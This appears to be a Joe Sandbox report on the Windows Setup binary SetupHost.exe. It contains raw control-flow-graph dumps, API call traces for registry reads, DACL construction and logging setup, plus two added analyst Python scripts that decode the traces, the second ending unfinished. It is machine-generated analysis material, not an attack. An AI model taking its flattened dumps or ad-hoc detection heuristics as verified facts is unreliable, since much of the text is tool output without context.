37686->37688 37687->37680 37687->37681 37688->37687 39921 547280 39922 547290 39921->39922 39923 5472a2 39921->39923 39927 5473aa 39922->39927 39928 5473bb 39927->39928 39929 5473cc 39928->39929 39952 547311 11 API calls 39928->39952 39931 547297 39929->39931 39932 5473d0 memset 39929->39932 39933 547803 39931->39933 39932->39931 39953 54f2f8 39933->39953 39935 54780f _wfopen 39936 547a07 39935->39936 39937 547848 GetProcessHeap HeapAlloc 39935->39937 39955 547a30 19 API calls 39936->39955 39946 54786d 39937->39946 39939 547a13 39939->39923 39940 547876 fgetws 39941 547a00 39940->39941 39940->39946 39941->39936 39942 5478b2 GetProcessHeap HeapReAlloc 39942->39936 39943 5478d9 fgetws 39942->39943 39945 547903 feof 39943->39945 39943->39946 39944 
54793a iswctype 39944->39946 39945->39936 39945->39946 39946->39936 39946->39940 39946->39942 39946->39944 39947 5479cc swscanf_s 39946->39947 39948 547966 GetProcessHeap HeapFree 39946->39948 39949 547988 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 39946->39949 39950 547979 GetProcessHeap HeapFree 39946->39950 39954 5475ab 52 API calls 39946->39954 39947->39936 39947->39946 39948->39946 39949->39936 39949->39946 39950->39949 39952->39928 39953->39935 39954->39946 39955->39939 40392 4e6690 GetWindowLongW 40393 4e66b8 DefWindowProcW 40392->40393 40394 4e66a4 40392->40394 40397 4e75c4 40394->40397 40398 4e7826 40397->40398 40399 4e75e3 40397->40399 40400 4e7833 40398->40400 40410 4e7a81 40398->40410 40401 4e778a 40399->40401 40402 4e75e9 40399->40402 40403 4e783c 40400->40403 40412 4e79af 40400->40412 40407 4e784a DefWindowProcW 40401->40407 40417 4e77f2 40401->40417 40430 4e77aa 40401->40430 40404 4e75f2 40402->40404 40428 4e7733 40402->40428 40406 4e7845 40403->40406 40415 4e78f4 40403->40415 40405 4e75fb 40404->40405 40413 4e76f3 40404->40413 40408 4e7607 40405->40408 40422 4e76ae 40405->40422 40406->40407 40419 4e785f 40406->40419 40452 4e66b4 40407->40452 40408->40407 40423 4e7613 40408->40423 40409 4e7ab9 PostQuitMessage 40409->40452 40410->40409 40426 4f8a19 186 API calls 40410->40426 40411 4e79e4 ShutdownBlockReasonCreate 40416 4e7a31 GetLastError 40411->40416 40434 4e79f4 40411->40434 40412->40411 40427 4f8a19 186 API calls 40412->40427 40431 4f8a19 186 API calls 40413->40431 40413->40452 40414 4e7929 ShutdownBlockReasonDestroy 40420 4e7974 GetLastError 40414->40420 40440 4e7936 40414->40440 40415->40414 40432 4f8a19 186 API calls 40415->40432 40446 4e797e 40416->40446 40417->40407 40436 4f8a19 186 API calls 40417->40436 40418 4e7891 40418->40430 40448 4e7690 40418->40448 40419->40418 40438 4f8a19 186 API calls 40419->40438 40420->40446 40421 4e76e1 40453 4f8877 40421->40453 40422->40421 40441 4f8a19 186 API calls 40422->40441 40424 4e7646 40423->40424 
40443 4f8a19 186 API calls 40423->40443 40444 4e7656 40424->40444 40424->40448 40429 4e7ab6 40426->40429 40433 4e79e1 40427->40433 40435 4f8a19 186 API calls 40428->40435 40428->40452 40429->40409 40437 4f8a19 186 API calls 40430->40437 40430->40452 40431->40452 40439 4e7926 40432->40439 40433->40411 40445 4f8a19 186 API calls 40434->40445 40434->40452 40435->40452 40442 4e781e 40436->40442 40437->40452 40438->40418 40439->40414 40447 4f8a19 186 API calls 40440->40447 40440->40452 40441->40421 40442->40407 40443->40424 40451 4f8a19 186 API calls 40444->40451 40444->40452 40445->40452 40449 4f8a19 186 API calls 40446->40449 40446->40452 40447->40452 40450 4f8a19 186 API calls 40448->40450 40448->40452 40449->40452 40450->40452 40451->40452 40454 4f8bee 14 API calls 40453->40454 40455 4f8891 40454->40455 40456 4fc640 13 API calls 40455->40456 40465 4f8897 40455->40465 40457 4f88ab 40456->40457 40459 4f88c8 40457->40459 40460 4fb3ee 17 API calls 40457->40460 40457->40465 40458 4f9d9c 6 API calls 40462 4f8909 40458->40462 40461 4fccb5 6 API calls 40459->40461 40459->40465 40460->40459 40463 4f88df 40461->40463 40462->40452 40464 4f8bb3 15 API calls 40463->40464 40463->40465 40464->40465 40465->40458 39956 546340 39959 5462c0 39956->39959 39960 5462e6 39959->39960 39963 546315 39960->39963 39964 54632a 39960->39964 39965 545479 39960->39965 39962 545479 6 API calls 39962->39964 39963->39962 39963->39964 39966 54540d 5 API calls 39965->39966 39967 54548a 39966->39967 39968 5454aa 39967->39968 39970 542370 WriteFile 39967->39970 39968->39963 39970->39968 37705 4e2f00 GetProcessHeap HeapAlloc 37706 4e2f59 UuidCreate 37705->37706 37707 4e2f8d 37705->37707 37859 4fcd57 memset SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 37706->37859 37709 4e2fbe 37707->37709 37710 4e2fdd 37707->37710 37757 4e2f9b 37707->37757 37712 4f9c14 11 API calls 37709->37712 37769 4fb2c2 37710->37769 37714 4e2fc9 37712->37714 37713 4e2fe5 37715 4f9d9c 6 API 
[Control-flow graph edge data from the interactive graph viewer (node IDs, basic-block addresses and edges such as 37713->37715); not reproducible as text. What is recoverable from it is the set of API calls reached from the listed entry points 4e30a4, 4e35c0, 5461c0, 4e8be0, 4ec756, 53de32, 4e93e0, 4e35f0, 4ed580 and 4fe3be: registry access preceded by IsWow64Process checks (RegOpenKeyExW, RegCreateKeyExW, RegQueryValueExW, RegSetValueExW, RegSetKeySecurity, RegCloseKey); DACL construction for a file opened with CreateFileW (OpenThreadToken/OpenProcessToken, GetTokenInformation, AllocateAndInitializeSid, InitializeSecurityDescriptor, InitializeAcl, AddAccessAllowedAce, EqualSid, SetSecurityDescriptorDacl, then SetFilePointer and GetFileSizeEx); module and OS inspection (GetModuleFileNameW, GetFileVersionInfoSizeExW, GetFileVersionInfoExW, VerQueryValueW, RtlGetVersion, GetNativeSystemInfo, GetSystemInfo, LoadLibraryW, LoadLibraryExW, GetProcAddress, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, CompareStringW, GetFileAttributesW); string parsing (strchr, strrchr, strtol, strncpy_s, MultiByteToWideChar); and a CreateFileW/DeviceIoControl pair at 4fe3f4/4fe412.]

Control-flow Graph

[Basic-block listing for function 53de32 (blocks 53de32 through 53e4a6) from the graph viewer; the executed/not-executed colouring is not recoverable as text. Calls reached in this function: __EH_prolog3_GS, memset x5, RtlGetVersion (directly at 53deb0 and via subcall 53e4a7), RegOpenKeyExW x2 (53df4e, 53e23e), RegQueryValueExW x3 (53df7e, 53dfd3, 53e015), RegCloseKey x3, LoadLibraryW and GetProcAddress (53e15b, 53e16c), GlobalFree, SetLastError/GetLastError, CompareStringW x2 (53e32c, 53e35b), FreeLibrary (53e478); internal subcalls 54f3e6, 4f9ca1, 53dc8e, 53dcf8, 53ddca, 4e17c0, 4e1d02, 54086c, 54df14, 4f9d53, 4f9d84, 4f9d6c, 4f9d9c, 4eee5d and 54f3a4.]
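The function above pairs RtlGetVersion with RegOpenKeyExW on HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion, and the APIs list of this report shows the raw arguments (hKey 80000002, samDesired 00020119). The script below is an example added by the editor; it is not part of the Joe Sandbox report or of the sample's code. It parses entries in the report's APIs list format, decodes the root key and the REGSAM access mask (00020119 is KEY_READ with KEY_WOW64_64KEY), and flags the RtlGetVersion plus CurrentVersion-read combination as OS-version fingerprinting. The sample lines are constructed from entries visible on this page; the flagging rule is the editor's own heuristic, not a Joe Sandbox signature.

```python
"""Parse Joe Sandbox "APIs" entries and decode a RegOpenKeyExW call.

Added example for this report; not Joe Sandbox code. The rule in
os_fingerprint_findings() is an editor's heuristic, not a sandbox signature.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: a subset of the entries shown for function 0053DE32,
# kept in the report's own list format.
SAMPLE = r"""
• __EH_prolog3_GS.LIBCMT ref: 0053DE3C
• memset.MSVCRT ref: 0053DE59
  • Part of subcall function 0053E4A7: RtlGetVersion.NTDLL ref: 0053E4EE
• RtlGetVersion.NTDLL ref: 0053DEFD
  • Part of subcall function 004F9CA1: GetModuleHandleExW.KERNEL32(00000001,ntdll.dll,?,?,?,?,00000000,?,004E7B5C), ref: 004F9CD7
• RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?), ref: 0053DF67
"""

# One entry: "[Part of subcall function ADDR:] Api.Module[(args)], ref: ADDR"
ENTRY_RE = re.compile(
    r"^\s*•\s+(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s+)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Predefined HKEY handles and REGSAM bits (winreg.h / winnt.h values).
HKEYS = {
    0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS",
    0x80000005: "HKEY_CURRENT_CONFIG",
}
REGSAM_BITS = {
    0x0001: "KEY_QUERY_VALUE", 0x0002: "KEY_SET_VALUE", 0x0004: "KEY_CREATE_SUB_KEY",
    0x0008: "KEY_ENUMERATE_SUB_KEYS", 0x0010: "KEY_NOTIFY", 0x0020: "KEY_CREATE_LINK",
    0x0100: "KEY_WOW64_64KEY", 0x0200: "KEY_WOW64_32KEY",
    0x00010000: "DELETE", 0x00020000: "READ_CONTROL",
    0x00040000: "WRITE_DAC", 0x00080000: "WRITE_OWNER",
}
KEY_READ, KEY_WRITE = 0x20019, 0x20006


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]          # raw argument strings as printed in the report
    ref: int                 # address of the call site
    via_subcall: Optional[int]  # address of the subcall function, if nested


def parse_api_list(text: str) -> List[ApiCall]:
    """Parse report entries; raise on a line that does not match the format."""
    calls = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = ENTRY_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised entry: {line!r}")
        args = m["args"].split(",") if m["args"] is not None else []
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16),
                             int(m["sub"], 16) if m["sub"] else None))
    return calls


def decode_regsam(mask: int) -> List[str]:
    """Name the bits of a REGSAM value, collapsing KEY_READ / KEY_WRITE first."""
    names, rest = [], mask
    for name, composite in (("KEY_READ", KEY_READ), ("KEY_WRITE", KEY_WRITE)):
        if mask & composite == composite:
            names.append(name)
            rest &= ~composite
    for bit in sorted(REGSAM_BITS):
        if rest & bit:
            names.append(REGSAM_BITS[bit])
            rest &= ~bit
    if rest:
        names.append(f"0x{rest:x}")  # bits this table does not know
    return names


def describe_reg_open(call: ApiCall) -> dict:
    """Decode hKey, lpSubKey and samDesired of a RegOpenKeyExW entry."""
    hkey, sam = int(call.args[0], 16), int(call.args[3], 16)
    return {"root": HKEYS.get(hkey, f"0x{hkey:08x}"),
            "subkey": call.args[1], "access": decode_regsam(sam)}


def os_fingerprint_findings(calls: List[ApiCall]) -> List[str]:
    """Editor's heuristic: RtlGetVersion plus a read of HKLM\\...\\Windows NT\\CurrentVersion."""
    findings = []
    version_refs = [f"{c.ref:08X}" for c in calls if c.api == "RtlGetVersion"]
    if version_refs:
        findings.append("RtlGetVersion at " + ", ".join(version_refs))
    for c in calls:
        if c.api != "RegOpenKeyExW":
            continue
        d = describe_reg_open(c)
        if d["root"] == "HKEY_LOCAL_MACHINE" and d["subkey"].lower().endswith(r"windows nt\currentversion"):
            findings.append(f"{d['root']}\\{d['subkey']} opened with {'|'.join(d['access'])} at {c.ref:08X}")
    return findings


if __name__ == "__main__":
    for finding in os_fingerprint_findings(parse_api_list(SAMPLE)):
        print(finding)
```

Decoding the mask is the point of the exercise: 00020119 is KEY_READ with KEY_WOW64_64KEY set, so this 32-bit image (the report's addresses are 32-bit and the graph data above includes IsWow64Process checks) explicitly asks for the 64-bit registry view. A detection rule built from this report should carry that flag as a named attribute rather than match the raw hex mask, so that the same behaviour with a different access mask is still caught.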
APIs
• __EH_prolog3_GS.LIBCMT ref: 0053DE3C
• memset.MSVCRT ref: 0053DE59
• memset.MSVCRT ref: 0053DE6A
  • Part of subcall function 0053E4A7: memset.MSVCRT ref: 0053E4D9
  • Part of subcall function 0053E4A7: RtlGetVersion.NTDLL ref: 0053E4EE
• memset.MSVCRT ref: 0053DEBA
• memset.MSVCRT ref: 0053DECF
• memset.MSVCRT ref: 0053DEE4
• RtlGetVersion.NTDLL ref: 0053DEFD
  • Part of subcall function 004F9CA1: GetModuleHandleExW.KERNEL32(00000001,ntdll.dll,?,?,?,?,00000000,?,004E7B5C), ref: 004F9CD7
  • Part of subcall function 004F9CA1: GetLastError.KERNEL32(?,?,?,00000000,?,004E7B5C), ref: 004F9CE1
• RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?), ref: 0053DF67
                                                                                                                        • RegQueryValueExW.KERNEL32(?,InstallationType,00000000,?,?,?), ref: 0053DFA9
                                                                                                                        • RegQueryValueExW.KERNEL32(?,EditionId,00000000,?,?,00000208), ref: 0053DFFE
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,DigitalProductId4,00000000,?,?,00000208), ref: 0053E041
                                                                                                                        • RegCloseKey.KERNEL32(?), ref: 0053E0B7
                                                                                                                          • Part of subcall function 004F9D9C: EtwEventEnabled.NTDLL(?,?,004FBC0D), ref: 004F9E13
                                                                                                                          • Part of subcall function 004F9D9C: EtwEventWrite.NTDLL(?,?,004FBC0D,{6c104913-738b-4411-a4ec-8b594e314f6b},00000000), ref: 004F9E3B
                                                                                                                          • Part of subcall function 004EEE5D: GetProcessHeap.KERNEL32(00000000,?,SYSTEM\Setup\MoSetup\Volatile,004FB3D8,00000002,00000000,SYSTEM\Setup\MoSetup\Volatile), ref: 004EEE6B
                                                                                                                          • Part of subcall function 004EEE5D: HeapFree.KERNEL32(00000000), ref: 004EEE72
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00000000,000004E1,base\ntsetup\conx\common\setuplib\src\osinfo.cpp,ConX::Setup::Common::COSInfoHelper::GetHostOSSKUInfo,00000002,00000000), ref: 0053E479
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0053E495
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: memset$QueryValue$CloseEventFreeHeapVersion$EnabledErrorH_prolog3_HandleLastLibraryModuleOpenProcessWrite
                                                                                                                        • String ID: %WINDOWS_LONG%$%hs: couldn't get host edition id$%hs: couldn't get host product name$BrandingFormatString$Client Workstation$Complete$ConX::Setup::Common::COSInfoHelper::GetHostOSSKUInfo$ConX::Setup::Common::COSInfoHelper::GetHostOSSKUInfo$Core$DigitalProductId4$EditionId$Failed to determine source edition type! Error: [0x%X]$HomeEdition$InstallationType$Professional$SOFTWARE\Microsoft\Sysprep$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Server Workstation$Source OS: Host SKU Info: Edition = '%s', Edition Type = '%s', Installation Type = '%s', Product Name = '%s', Arch = %s, StationType = %s, Stage type = %s$Staged Image$Unstaged Image$amd64$arm$arm64$base\ntsetup\conx\common\setuplib\src\osinfo.cpp$unknown$winbrand.dll$x86
                                                                                                                        • API String ID: 579081697-1122241035
                                                                                                                        • Opcode ID: 4bc20007a4416171cfb4c8baa30878b532056fe7e9e7a8bf7dcd15a6392d78d7
                                                                                                                        • Instruction ID: 4431f2282cd72c501d0d3379483061b71a7eade416478cf5959e43d35e8fb077
                                                                                                                        • Opcode Fuzzy Hash: 4bc20007a4416171cfb4c8baa30878b532056fe7e9e7a8bf7dcd15a6392d78d7
                                                                                                                        • Instruction Fuzzy Hash: B9F1E475A00318ABDF209F50DC4AFAE7BB8BF95711F10019AF509A62D0DBB49E84CF56

                                                                                                                        Control-flow Graph
                                                                                                                        (function at 0053F60E: basic-block/edge listing and Executed/Not Executed colouring not reproduced here; its API calls are listed under APIs below)
                                                                                                                        APIs
                                                                                                                        • memset.MSVCRT ref: 0053F693
                                                                                                                        • memset.MSVCRT ref: 0053F6A7
                                                                                                                        • memset.MSVCRT ref: 0053F6B6
                                                                                                                        • memset.MSVCRT ref: 0053F6C5
                                                                                                                        • memset.MSVCRT ref: 0053F6D4
                                                                                                                        • memset.MSVCRT ref: 0053F6E3
                                                                                                                        • memset.MSVCRT ref: 0053F6F5
                                                                                                                        • memset.MSVCRT ref: 0053F704
                                                                                                                          • Part of subcall function 0054290C: GetVersion.KERNEL32 ref: 0054294F
                                                                                                                          • Part of subcall function 0054290C: GetModuleHandleW.KERNEL32(kernel32), ref: 005429C3
                                                                                                                          • Part of subcall function 0054290C: GetProcAddress.KERNEL32(00000000,AddVectoredExceptionHandler), ref: 005429D3
                                                                                                                          • Part of subcall function 0054290C: memset.MSVCRT ref: 00542A87
                                                                                                                          • Part of subcall function 0054290C: ExpandEnvironmentStringsW.KERNEL32(%windir%\system32\dbghelp.dll,?,00000104), ref: 00542AA0
                                                                                                                          • Part of subcall function 0054290C: LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00542AB3
                                                                                                                          • Part of subcall function 0054290C: FreeLibrary.KERNEL32(00000000), ref: 00542AC8
                                                                                                                        • GetLastError.KERNEL32 ref: 0053F76D
                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,000000FA), ref: 0053F814
                                                                                                                          • Part of subcall function 004FE595: _vsnwprintf.MSVCRT ref: 004FE5C7
                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(%WINDIR%\Minidump,C:\$Windows.~WS\Sources\Panther\,00000104), ref: 0053FC1F
                                                                                                                        • GetFileAttributesW.KERNEL32(C:\$Windows.~WS\Sources\Panther\), ref: 0053FC2A
                                                                                                                        • GetTempPathW.KERNEL32(00000104,C:\$Windows.~WS\Sources\Panther\), ref: 0053FC48
                                                                                                                        • wcsrchr.MSVCRT ref: 0053FC68
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(0053F3E0), ref: 0053FC96
                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 0053FF81
                                                                                                                        • GetLastError.KERNEL32(00000000,00000000), ref: 0054000B
                                                                                                                        • RtlAddVectoredExceptionHandler.NTDLL ref: 00540071
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: memset$EnvironmentErrorExceptionExpandLastLibraryStrings$AddressAttributesCurrentDirectoryFileFilterFreeHandleHandlerLoadModulePathProcProcessTempUnhandledVectoredVersionWindows_vsnwprintfwcsrchr
                                                                                                                        • String ID: %S\%s$%WINDIR%\Minidump$%s\$C:\$Windows.~WS\Sources\Panther\$C:\$Windows.~WS\Sources\SetupHost.Exe$C:\$Windows.~WS\Sources\SetupHost.Exe$CONOUT$$Con$Err$Fil$Fun$Global\SetupLog$Global\WdsSetupLogInit$Msg$SACSetupAct$SACSetupErr$SetupLog$Sev$Uid$Unable to load global log filter.$WdsSetupLogInit$Windows Setup activity log$Windows Setup error log$c:\$debug.log$diagerr.xml$diagwrn.xml$onecore\base\ntsetup\panther\wdslog\setuplog.cpp$setupact.log$setuperr.log$setuplog.cfg$setuplog.xml$(T$T
                                                                                                                        • API String ID: 2056404476-188612845
                                                                                                                        • Opcode ID: 21f18d194f863474073e16eeb992050d1f04beb65b87e312ffbafff73a4dfbed
                                                                                                                        • Instruction ID: edafc7e28efcc399928d50abe3158deb10590324722d86bec21960e1022ef198
                                                                                                                        • Opcode Fuzzy Hash: 21f18d194f863474073e16eeb992050d1f04beb65b87e312ffbafff73a4dfbed
                                                                                                                        • Instruction Fuzzy Hash: 625271B1A003299BDB20CF15DC59BEABBB8BF58701F5040BAE949E3290D7749E84DF54

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • InitializeSecurityDescriptor.ADVAPI32(?,00000001,00552740,0000003C,005427B4), ref: 00541FCA
                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,005427B4,?,00000001,00552740,0000003C,005427B4), ref: 00541FEF
                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0000003C,?,00000001,00552740,0000003C,005427B4), ref: 00542010
                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000013,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000001,00552740,0000003C,005427B4), ref: 00542031
                                                                                                                        • GetCurrentThread.KERNEL32 ref: 00542047
                                                                                                                        • OpenThreadToken.ADVAPI32(00000000,?,00000001,00552740,0000003C,005427B4), ref: 0054204E
                                                                                                                        • GetLastError.KERNEL32(?,00000001,00552740,0000003C,005427B4), ref: 00542058
                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,00552740,?,00000001,00552740,0000003C,005427B4), ref: 0054206F
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,00000001,00552740,0000003C,005427B4), ref: 00542076
                                                                                                                        • GetTokenInformation.KERNELBASE(00552740,00000001(TokenIntegrityLevel),00000000,00000000,00000001,?,00000001,00552740,0000003C,005427B4), ref: 00542098
                                                                                                                        • GetLastError.KERNEL32(?,00000001,00552740,0000003C,005427B4), ref: 005420A6
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000001,?,00000001,00552740,0000003C,005427B4), ref: 005420BA
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000001,00552740,0000003C,005427B4), ref: 005420C1
                                                                                                                        • GetTokenInformation.KERNELBASE(00552740,00000001(TokenIntegrityLevel),00000000,00000001,00000001,?,00000001,00552740,0000003C,005427B4), ref: 005420E1
                                                                                                                        • GetLengthSid.ADVAPI32(00000000,?,00000001,00552740,0000003C,005427B4), ref: 005420F1
                                                                                                                        • GetLengthSid.ADVAPI32(?,?,00000001,00552740,0000003C,005427B4), ref: 005420FC
                                                                                                                        • GetLengthSid.ADVAPI32(0000003C,?,00000001,00552740,0000003C,005427B4), ref: 00542107
                                                                                                                        • GetLengthSid.ADVAPI32(005427B4,?,00000001,00552740,0000003C,005427B4), ref: 00542112
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,?,00000001,00552740,0000003C,005427B4), ref: 00542123
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000001,00552740,0000003C,005427B4), ref: 0054212A
                                                                                                                        • InitializeAcl.ADVAPI32(00000000,?,00000002,?,00000001,00552740,0000003C,005427B4), ref: 00542143
                                                                                                                        • AddAccessAllowedAce.ADVAPI32(00000000,00000002,C01F0000,005427B4,?,00000001,00552740,0000003C,005427B4), ref: 00542158
                                                                                                                        • AddAccessAllowedAce.ADVAPI32(00000000,00000002,C01F0000,0000003C,?,00000001,00552740,0000003C,005427B4), ref: 0054216D
                                                                                                                        • AddAccessAllowedAce.ADVAPI32(00000000,00000002,C0110000,?,?,00000001,00552740,0000003C,005427B4), ref: 00542182
                                                                                                                        • EqualSid.ADVAPI32(?,00000000,?,00000001,00552740,0000003C,005427B4), ref: 00542191
                                                                                                                        • AddAccessAllowedAce.ADVAPI32(00000000,00000002,C01F0000,00000000,?,00000001,00552740,0000003C,005427B4), ref: 005421A5
                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,00000001,00552740,0000003C,005427B4), ref: 005421B6
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005421DF
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 005421E6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$InitializeProcess$AccessAllowedLengthToken$Allocate$AllocCurrentDescriptorErrorInformationLastOpenSecurityThread$DaclEqualFree
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 719363623-0
                                                                                                                        • Opcode ID: 9c991f97ae6db8255819a8cb4d5fb31933fd7f8bf7788a92158fbace2622a81a
                                                                                                                        • Instruction ID: 733550100dc9a87c81332aab9950dc50435ae4c842b5385b7a465ce4bb93a057
                                                                                                                        • Opcode Fuzzy Hash: 9c991f97ae6db8255819a8cb4d5fb31933fd7f8bf7788a92158fbace2622a81a
                                                                                                                        • Instruction Fuzzy Hash: B1612975A00318ABEB219FA6EC4DBEEBEB8FF18755F444068F605E21A0D7719905DF20
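Added analyst note, not part of the Joe Sandbox output: the InitializeSecurityDescriptor / AllocateAndInitializeSid / AddAccessAllowedAce / SetSecurityDescriptorDacl sequence in the entry above builds a DACL, and the raw trace arguments are enough to recover most of it. The Python below parses the API lines exactly as this report prints them (copied in as a constructed sample), rebuilds each SID on the assumption that the unresolved '?' identifier-authority pointer is SECURITY_NT_AUTHORITY (5), takes the eleventh argument slot of AllocateAndInitializeSid as the pSid out-pointer (that follows from the documented prototype: authority, count, eight sub-authority slots, out pointer), matches each ACE's SID argument against those out-pointer values, and expands the access masks. Under that assumption the three SIDs are BUILTIN\Administrators, NT AUTHORITY\SYSTEM and NT AUTHORITY\LOCAL SERVICE; ACEs whose SID pointer the trace shows as '?' or 00000000 are reported as unresolved rather than guessed. The parser, table and function names are mine, not the sandbox's.

```python
"""Decode a Joe Sandbox ADVAPI32 DACL-building trace into SIDs and rights."""
import re

# Constructed sample: the AllocateAndInitializeSid / AddAccessAllowedAce lines
# copied from the report entry above (the trailing arguments are stack slots
# the plugin prints beyond the real parameter list).
TRACE = """
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,005427B4,?,00000001,00552740,0000003C,005427B4), ref: 00541FEF
AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0000003C,?,00000001,00552740,0000003C,005427B4), ref: 00542010
AllocateAndInitializeSid.ADVAPI32(?,00000001,00000013,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000001,00552740,0000003C,005427B4), ref: 00542031
AddAccessAllowedAce.ADVAPI32(00000000,00000002,C01F0000,005427B4,?,00000001,00552740,0000003C,005427B4), ref: 00542158
AddAccessAllowedAce.ADVAPI32(00000000,00000002,C01F0000,0000003C,?,00000001,00552740,0000003C,005427B4), ref: 0054216D
AddAccessAllowedAce.ADVAPI32(00000000,00000002,C0110000,?,?,00000001,00552740,0000003C,005427B4), ref: 00542182
AddAccessAllowedAce.ADVAPI32(00000000,00000002,C01F0000,00000000,?,00000001,00552740,0000003C,005427B4), ref: 005421A5
"""

# Assumption: the trace never resolves the SID_IDENTIFIER_AUTHORITY pointer
# ('?'), so we take it to be SECURITY_NT_AUTHORITY, which is what every
# well-known SID used for DACLs on Windows objects is built from.
NT_AUTHORITY = 5

WELL_KNOWN = {
    "S-1-5-18": "NT AUTHORITY\\SYSTEM",
    "S-1-5-19": "NT AUTHORITY\\LOCAL SERVICE",
    "S-1-5-20": "NT AUTHORITY\\NETWORK SERVICE",
    "S-1-5-32-544": "BUILTIN\\Administrators",
    "S-1-5-32-545": "BUILTIN\\Users",
}

# Generic and standard rights bits of an ACCESS_MASK, most significant first.
ACCESS_BITS = [
    (0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE"),
    (0x20000000, "GENERIC_EXECUTE"), (0x10000000, "GENERIC_ALL"),
    (0x00100000, "SYNCHRONIZE"), (0x00080000, "WRITE_OWNER"),
    (0x00040000, "WRITE_DAC"), (0x00020000, "READ_CONTROL"),
    (0x00010000, "DELETE"),
]

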